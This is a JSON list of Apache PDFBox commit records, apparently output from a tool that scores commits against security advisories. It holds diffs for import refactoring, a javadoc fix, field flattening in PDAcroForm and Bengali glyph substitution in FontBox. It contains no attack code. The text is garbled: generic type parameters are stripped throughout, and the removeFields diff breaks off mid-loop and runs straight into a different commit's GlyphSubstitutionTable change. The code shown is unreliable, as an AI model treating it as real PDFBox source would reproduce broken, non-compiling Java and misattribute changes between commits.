org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceDictionary;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", - "index 0ad7db323..d3e6e44e6 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", - "@@ -38,3 +38,3 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", - "index aeca90d60..0fa2d5ee6 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", - "@@ -21,3 +21,3 @@ import java.util.List;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.form.PlainText.Line;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4068": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4068", - "relevance": 2 - } - ] - }, - { - "commit_id": "2b4f2bd5014d4e064efc7da267aae4717fd2e19a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528223680, - "hunks": 1, - "message": "PDFBOX-4237: fix javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832960 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "index 7dc5b144e..91edf6246 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "@@ -55,3 +55,3 @@ public class PDFStreamParser extends BaseParser", - " *", - "- * @param contentStream The content stream to parse.", - "+ * @param stream The content stream to parse.", - " * @throws IOException If there is an error initializing the stream." - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4237": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4237", - "relevance": 2 - } - ] - }, - { - "commit_id": "72ec17d71c526a8c8053a4262ecf6c56249ceaab", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523433953, - "hunks": 6, - "message": "PDFBOX-3809: support flatten for specific fields only; current limitation is that the widget annotation must have a page reference git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828871 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "index 9735402c4..e715bb9a4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "@@ -273,2 +273,4 @@ public final class PDAcroForm implements COSObjectable", - "+ Map> pagesWidgetsMap = buildPagesWidgetsMap(fields);", - "+ ", - " // preserve all non widget annotations", - "@@ -276,2 +278,3 @@ public final class PDAcroForm implements COSObjectable", - " {", - "+ Map widgetsForPageMap = pagesWidgetsMap.get(page.getCOSObject());", - " isContentStreamWrapped = false;", - "@@ -279,6 +282,6 @@ public final class PDAcroForm implements COSObjectable", - " List annotations = new ArrayList<>();", - "- ", - "+ ", - " for (PDAnnotation annotation: page.getAnnotations())", - "- {", - "- if (!(annotation instanceof PDAnnotationWidget))", - "+ { ", - "+ if (widgetsForPageMap != null && widgetsForPageMap.get(annotation.getCOSObject()) == null)", - " {", - "@@ -352,3 +355,3 @@ public final class PDAcroForm implements COSObjectable", - " // remove the fields", - "- setFields(Collections.emptyList());", - "+ removeFields(fields);", - "@@ -767,2 +770,69 @@ public final class PDAcroForm implements COSObjectable", - "+ private Map> buildPagesWidgetsMap(List fields)", - "+ {", - "+ Map> pagesAnnotationsMap = new HashMap<>();", - "+ boolean hasMissingPageRef = false;", - "+ ", - "+ for (PDField field : fields)", - "+ {", - "+ List widgets = field.getWidgets();", - "+ for (PDAnnotationWidget widget : widgets)", - "+ {", - "+ PDPage pageForWidget = widget.getPage();", - "+ if (pageForWidget != null)", - "+ {", - "+ if (pagesAnnotationsMap.get(pageForWidget.getCOSObject()) == null)", - "+ {", - "+ Map widgetsForPage = new HashMap<>();", - "+ widgetsForPage.put(widget.getCOSObject(), widget);", - "+ pagesAnnotationsMap.put(pageForWidget.getCOSObject(), widgetsForPage);", - "+ }", - "+ else", - "+ {", - "+ Map widgetsForPage = pagesAnnotationsMap.get(pageForWidget.getCOSObject());", - "+ widgetsForPage.put(widget.getCOSObject(), widget);", - "+ }", - "+ }", - "+ else", - "+ {", - "+ hasMissingPageRef = true;", - "+ }", - "+ }", - "+ }", - "+ ", - "+ // TODO: if there is a widget with a missing page reference ", - "+ // we'd need to build the map reverse i.e. form the annotations to the ", - "+ // widget. But this will be much slower so will be omitted for now.", - "+ LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", - "+ ", - "+ return pagesAnnotationsMap;", - "+ }", - "+ ", - "+ private void removeFields(List fields)", - "+ {", - "+ for (PDField field : fields) {", - "+ if (field.getParent() == null)", - "+ {", - "+ COSArray cosFields = (COSArray) dictionary.getDictionaryObject(COSName.FIELDS);", - "+ for (int i=0; i, Integer>> rawGSubData;", - "+ private GsubData gsubData;", - "@@ -105,5 +106,4 @@ public class GlyphSubstitutionTable extends TTFTable", - "- rawGSubData = glyphSubstitutionDataExtractor", - "+ gsubData = glyphSubstitutionDataExtractor", - " .getGsubData(scriptList, featureListTable, lookupListTable);", - "- LOG.debug(\"rawGSubData: \" + rawGSubData);", - " }", - "@@ -672,5 +672,5 @@ public class GlyphSubstitutionTable extends TTFTable", - "- public Map, Integer>> getRawGSubData()", - "+ public GsubData getGsubData()", - " {", - "- return rawGSubData;", - "+ return gsubData;", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "index 8edcc6188..948c13674 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "@@ -29,4 +29,2 @@ import java.util.List;", - " import java.util.Map;", - "-import org.apache.fontbox.FontBoxFont;", - "-import org.apache.fontbox.util.BoundingBox;", - "@@ -34,2 +32,5 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.FontBoxFont;", - "+import org.apache.fontbox.ttf.model.GsubData;", - "+import org.apache.fontbox.util.BoundingBox;", - "@@ -656,3 +657,3 @@ public class TrueTypeFont implements FontBoxFont, Closeable", - "- public Map, Integer>> getGlyphSubstitutionMap() throws IOException", - "+ public GsubData getGsubData() throws IOException", - " {", - "@@ -661,6 +662,6 @@ public class TrueTypeFont implements FontBoxFont, Closeable", - " {", - "- return Collections.emptyMap();", - "+ return GsubData.NO_DATA_FOUND;", - " }", - "- return table.getRawGSubData();", - "+ return table.getGsubData();", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "index 7fb2c0eea..6eaec7b02 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "@@ -28,2 +28,5 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.model.GsubData;", - "+import org.apache.fontbox.ttf.model.Language;", - "+import org.apache.fontbox.ttf.model.MapBackedGsubData;", - " import org.apache.fontbox.ttf.table.common.CoverageTable;", - "@@ -54,5 +57,3 @@ public class GlyphSubstitutionDataExtractor", - "- private static final String[] SUPPORTED_LANGUAGES = { \"bng2\", \"beng\" };", - "-", - "- public Map, Integer>> getGsubData(Map scriptList,", - "+ public GsubData getGsubData(Map scriptList,", - " FeatureListTable featureListTable, LookupListTable lookupListTable)", - "@@ -60,9 +61,11 @@ public class GlyphSubstitutionDataExtractor", - "- ScriptTable scriptTable = getSupportedLanguage(scriptList);", - "+ ScriptTableDetails scriptTableDetails = getSupportedLanguage(scriptList);", - "- if (scriptTable == null)", - "+ if (scriptTableDetails == null)", - " {", - "- return Collections.emptyMap();", - "+ return GsubData.NO_DATA_FOUND;", - " }", - "+ ScriptTable scriptTable = scriptTableDetails.getScriptTable();", - "+", - " Map, Integer>> gsubData = new LinkedHashMap<>();", - "@@ -78,12 +81,17 @@ public class GlyphSubstitutionDataExtractor", - " }", - "- return Collections.unmodifiableMap(gsubData);", - "+", - "+ return new MapBackedGsubData(scriptTableDetails.getLanguage(),", - "+ scriptTableDetails.getFeatureName(), gsubData);", - " }", - "- private ScriptTable getSupportedLanguage(Map scriptList)", - "+ private ScriptTableDetails getSupportedLanguage(Map scriptList)", - " {", - "- for (String supportedLanguage : SUPPORTED_LANGUAGES)", - "+ for (Language lang : Language.values())", - " {", - "- if (scriptList.containsKey(supportedLanguage))", - "+ for (String scriptName : lang.getScriptNames())", - " {", - "- return scriptList.get(supportedLanguage);", - "+ if (scriptList.containsKey(scriptName))", - "+ {", - "+ return new ScriptTableDetails(lang, scriptName, scriptList.get(scriptName));", - "+ }", - " }", - "@@ -234,2 +242,32 @@ public class GlyphSubstitutionDataExtractor", - "+ private static class ScriptTableDetails", - "+ {", - "+ private final Language language;", - "+ private final String featureName;", - "+ private final ScriptTable scriptTable;", - "+", - "+ private ScriptTableDetails(Language language, String featureName, ScriptTable scriptTable)", - "+ {", - "+ this.language = language;", - "+ this.featureName = featureName;", - "+ this.scriptTable = scriptTable;", - "+ }", - "+", - "+ public Language getLanguage()", - "+ {", - "+ return language;", - "+ }", - "+", - "+ public String getFeatureName()", - "+ {", - "+ return featureName;", - "+ }", - "+", - "+ public ScriptTable getScriptTable()", - "+ {", - "+ return scriptTable;", - "+ }", - "+", - "+ }", - "+", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "index 8e3287ed7..23060ed51 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "@@ -30,5 +30,8 @@ public interface GsubWorker", - " {", - "- List substituteGlyphs(List originalGlyphIds);", - "-", - "- List repositionGlyphs(List originalGlyphIds);", - "+ /**", - "+ * Applies language-specific transforms including GSUB and any other pre or post-processing necessary for displaying", - "+ * Glyphs correctly.", - "+ * ", - "+ */", - "+ List applyTransforms(List originalGlyphIds);", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java", - "new file mode 100644", - "index 000000000..872ccfd9a", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java", - "@@ -0,0 +1,46 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import org.apache.fontbox.ttf.CmapLookup;", - "+import org.apache.fontbox.ttf.model.GsubData;", - "+import org.apache.fontbox.ttf.model.Language;", - "+", - "+/**", - "+ * Gets a {@link Language} specific instance of a {@link GsubWorker}", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class GsubWorkerFactory", - "+{", - "+", - "+ public GsubWorker getGsubWorker(CmapLookup cmapLookup, GsubData gsubData)", - "+ {", - "+ switch (gsubData.getLanguage())", - "+ {", - "+ case BENGALI:", - "+ return new GsubWorkerForBengali(cmapLookup, gsubData);", - "+ default:", - "+ throw new UnsupportedOperationException(", - "+ \"The language \" + gsubData.getLanguage() + \" is not yet supported\");", - "+ }", - "+", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "index d44ba3a50..7c9feaefb 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "@@ -22,2 +22,3 @@ import java.util.Arrays;", - " import java.util.Collections;", - "+import java.util.HashMap;", - " import java.util.List;", - "@@ -28,2 +29,4 @@ import org.apache.commons.logging.LogFactory;", - " import org.apache.fontbox.ttf.CmapLookup;", - "+import org.apache.fontbox.ttf.model.GsubData;", - "+import org.apache.fontbox.ttf.model.ScriptFeature;", - "@@ -41,2 +44,4 @@ public class GsubWorkerForBengali implements GsubWorker", - "+ private static final String INIT_FEATURE = \"init\";", - "+", - " /**", - "@@ -46,16 +51,23 @@ public class GsubWorkerForBengali implements GsubWorker", - " private static final List FEATURES_IN_ORDER = Arrays.asList(\"locl\", \"nukt\", \"akhn\",", - "- \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", \"init\", \"pres\", \"abvs\", \"blws\", \"psts\",", - "- \"haln\", \"calt\");", - "+ \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", INIT_FEATURE, \"pres\", \"abvs\", \"blws\",", - "+ \"psts\", \"haln\", \"calt\");", - " private static final char[] BEFORE_HALF_CHARS = new char[] { '\\u09BF', '\\u09C7', '\\u09C8' };", - "+ private static final BeforeAndAfterSpanComponent[] BEFORE_AND_AFTER_SPAN_CHARS = new BeforeAndAfterSpanComponent[] {", - "+ new BeforeAndAfterSpanComponent('\\u09CB', '\\u09C7', '\\u09BE'),", - "+ new BeforeAndAfterSpanComponent('\\u09CC', '\\u09C7', '\\u09D7') };", - "- private final Map, Integer>> glyphSubstitutionMap;", - "+ private final CmapLookup cmapLookup;", - "+ private final GsubData gsubData;", - " private final List beforeHalfGlyphIds;", - "+ private final Map beforeAndAfterSpanGlyphIds;", - "+", - "- public GsubWorkerForBengali(CmapLookup cmapLookup,", - "- Map, Integer>> glyphSubstitutionMap)", - "+ GsubWorkerForBengali(CmapLookup cmapLookup, GsubData gsubData)", - " {", - "- this.glyphSubstitutionMap = glyphSubstitutionMap;", - "- beforeHalfGlyphIds = getBeforeHalfGlyphIds(cmapLookup);", - "+ this.cmapLookup = cmapLookup;", - "+ this.gsubData = gsubData;", - "+ beforeHalfGlyphIds = getBeforeHalfGlyphIds();", - "+ beforeAndAfterSpanGlyphIds = getBeforeAndAfterSpanGlyphIds();", - " }", - "@@ -63,3 +75,3 @@ public class GsubWorkerForBengali implements GsubWorker", - " @Override", - "- public List substituteGlyphs(List originalGlyphIds)", - "+ public List applyTransforms(List originalGlyphIds)", - " {", - "@@ -69,3 +81,3 @@ public class GsubWorkerForBengali implements GsubWorker", - " {", - "- if (!glyphSubstitutionMap.containsKey(feature))", - "+ if (!gsubData.isFeatureSupported(feature))", - " {", - "@@ -77,12 +89,19 @@ public class GsubWorkerForBengali implements GsubWorker", - "- Map, Integer> featureMap = glyphSubstitutionMap.get(feature);", - "+ ScriptFeature scriptFeature = gsubData.getFeature(feature);", - "- intermediateGlyphsFromGsub = applyGsubFeature(featureMap, intermediateGlyphsFromGsub);", - "+ intermediateGlyphsFromGsub = applyGsubFeature(scriptFeature,", - "+ intermediateGlyphsFromGsub);", - " }", - "- return intermediateGlyphsFromGsub;", - "+ return Collections.unmodifiableList(repositionGlyphs(intermediateGlyphsFromGsub));", - " }", - "- @Override", - "- public List repositionGlyphs(List originalGlyphIds)", - "+ private List repositionGlyphs(List originalGlyphIds)", - "+ {", - "+ List glyphsRepositionedByBeforeHalf = repositionBeforeHalfGlyphIds(", - "+ originalGlyphIds);", - "+ return repositionBeforeAndAfterSpanGlyphIds(glyphsRepositionedByBeforeHalf);", - "+ }", - "+", - "+ private List repositionBeforeHalfGlyphIds(List originalGlyphIds)", - " {", - "@@ -103,3 +122,25 @@ public class GsubWorkerForBengali implements GsubWorker", - "- private List applyGsubFeature(Map, Integer> featureMap,", - "+ private List repositionBeforeAndAfterSpanGlyphIds(List originalGlyphIds)", - "+ {", - "+ List repositionedGlyphIds = new ArrayList<>(originalGlyphIds);", - "+", - "+ for (int index = 1; index < originalGlyphIds.size(); index++)", - "+ {", - "+ int glyphId = originalGlyphIds.get(index);", - "+ if (beforeAndAfterSpanGlyphIds.containsKey(glyphId))", - "+ {", - "+ BeforeAndAfterSpanComponent beforeAndAfterSpanComponent = beforeAndAfterSpanGlyphIds", - "+ .get(glyphId);", - "+ int previousGlyphId = originalGlyphIds.get(index - 1);", - "+ repositionedGlyphIds.set(index, previousGlyphId);", - "+ repositionedGlyphIds.set(index - 1,", - "+ getGlyphId(beforeAndAfterSpanComponent.beforeComponentCharacter));", - "+ repositionedGlyphIds.add(index + 1,", - "+ getGlyphId(beforeAndAfterSpanComponent.afterComponentCharacter));", - "+ }", - "+ }", - "+ return repositionedGlyphIds;", - "+ }", - "+", - "+ private List applyGsubFeature(ScriptFeature scriptFeature,", - " List originalGlyphs)", - "@@ -108,3 +149,3 @@ public class GsubWorkerForBengali implements GsubWorker", - " GlyphArraySplitter glyphArraySplitter = new GlyphArraySplitterRegexImpl(", - "- featureMap.keySet());", - "+ scriptFeature.getAllGlyphIdsForSubstitution());", - "@@ -116,6 +157,6 @@ public class GsubWorkerForBengali implements GsubWorker", - " {", - "- if (featureMap.containsKey(chunk))", - "+ if (scriptFeature.canReplaceGlyphs(chunk))", - " {", - " // gsub system kicks in, you get the glyphId directly", - "- int glyphId = featureMap.get(chunk);", - "+ int glyphId = scriptFeature.getReplacementForGlyphs(chunk);", - " gsubProcessedGlyphs.add(glyphId);", - "@@ -134,12 +175,63 @@ public class GsubWorkerForBengali implements GsubWorker", - "- private static List getBeforeHalfGlyphIds(CmapLookup cmapLookup)", - "+ private List getBeforeHalfGlyphIds()", - " {", - "- List beforeHalfGlyphIds = new ArrayList<>();", - "+ List glyphIds = new ArrayList<>();", - "- for (char beforeHalfChar : BEFORE_HALF_CHARS)", - "+ for (char character : BEFORE_HALF_CHARS)", - " {", - "- beforeHalfGlyphIds.add(cmapLookup.getGlyphId(beforeHalfChar));", - "+ glyphIds.add(getGlyphId(character));", - " }", - "- return Collections.unmodifiableList(beforeHalfGlyphIds);", - "+ if (gsubData.isFeatureSupported(INIT_FEATURE))", - "+ {", - "+ ScriptFeature feature = gsubData.getFeature(INIT_FEATURE);", - "+ for (List glyphCluster : feature.getAllGlyphIdsForSubstitution())", - "+ {", - "+ glyphIds.add(feature.getReplacementForGlyphs(glyphCluster));", - "+ }", - "+ }", - "+", - "+ return Collections.unmodifiableList(glyphIds);", - "+", - "+ }", - "+", - "+ private Integer getGlyphId(char character)", - "+ {", - "+ return cmapLookup.getGlyphId(character);", - "+ }", - "+", - "+ private Map getBeforeAndAfterSpanGlyphIds()", - "+ {", - "+ Map beforeAndAfterSpanGlyphIds = new HashMap<>();", - "+", - "+ for (BeforeAndAfterSpanComponent beforeAndAfterSpanComponent : BEFORE_AND_AFTER_SPAN_CHARS)", - "+ {", - "+ beforeAndAfterSpanGlyphIds.put(", - "+ getGlyphId(beforeAndAfterSpanComponent.originalCharacter),", - "+ beforeAndAfterSpanComponent);", - "+ }", - "+", - "+ return Collections.unmodifiableMap(beforeAndAfterSpanGlyphIds);", - "+ }", - "+", - "+ /**", - "+ * Models characters like O-kar (\\u09CB) and OU-kar (\\u09CC). Since these 2 characters is", - "+ * represented by 2 components, one before and one after the Vyanjan Varna on which this is", - "+ * used, this glyph has to be replaced by these 2 glyphs. For O-kar, it has to be replaced by", - "+ * E-kar (\\u09C7) and AA-kar (\\u09BE). For OU-kar, it has be replaced by E-kar (\\u09C7) and", - "+ * \\u09D7.", - "+ *", - "+ */", - "+ private static class BeforeAndAfterSpanComponent {", - "+ private final char originalCharacter;", - "+ private final char beforeComponentCharacter;", - "+ private final char afterComponentCharacter;", - "+", - "+ BeforeAndAfterSpanComponent(char originalCharacter, char beforeComponentCharacter,", - "+ char afterComponentCharacter)", - "+ {", - "+ this.originalCharacter = originalCharacter;", - "+ this.beforeComponentCharacter = beforeComponentCharacter;", - "+ this.afterComponentCharacter = afterComponentCharacter;", - "+ }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java", - "new file mode 100644", - "index 000000000..425d14b80", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java", - "@@ -0,0 +1,83 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.model;", - "+", - "+import java.util.Set;", - "+", - "+/**", - "+ * Model for data from the GSUB tables", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public interface GsubData", - "+{", - "+ /**", - "+ * To be used when there is no GSUB data available", - "+ */", - "+ GsubData NO_DATA_FOUND = new GsubData()", - "+ {", - "+", - "+ @Override", - "+ public boolean isFeatureSupported(String featureName)", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - "+ @Override", - "+ public Language getLanguage()", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - "+ @Override", - "+ public ScriptFeature getFeature(String featureName)", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - "+ @Override", - "+ public String getActiveScriptName()", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - "+ @Override", - "+ public Set getSupportedFeatures()", - "+ {", - "+ throw new UnsupportedOperationException();", - "+ }", - "+ };", - "+", - "+ Language getLanguage();", - "+", - "+ /**", - "+ * A {@link Language} can have more than one script that is supported. However, at any given", - "+ * point, only one of the many scripts are active.", - "+ *", - "+ * @return The name of the script that is active.", - "+ */", - "+ String getActiveScriptName();", - "+", - "+ boolean isFeatureSupported(String featureName);", - "+", - "+ ScriptFeature getFeature(String featureName);", - "+", - "+ Set getSupportedFeatures();", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java", - "new file mode 100644", - "index 000000000..9e360813d", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java", - "@@ -0,0 +1,55 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.model;", - "+", - "+import org.apache.fontbox.ttf.gsub.GsubWorker;", - "+import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", - "+import org.apache.fontbox.ttf.table.common.ScriptRecord;", - "+", - "+/**", - "+ * Enumerates the languages supported for GSUB operation. In order to support a new language, you", - "+ * need to add it here and then implement the {@link GsubWorker} for the given language and return", - "+ * the same from the", - "+ * {@link GsubWorkerFactory#getGsubWorker(org.apache.fontbox.ttf.CmapLookup, GsubData)}", - "+ *", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public enum Language", - 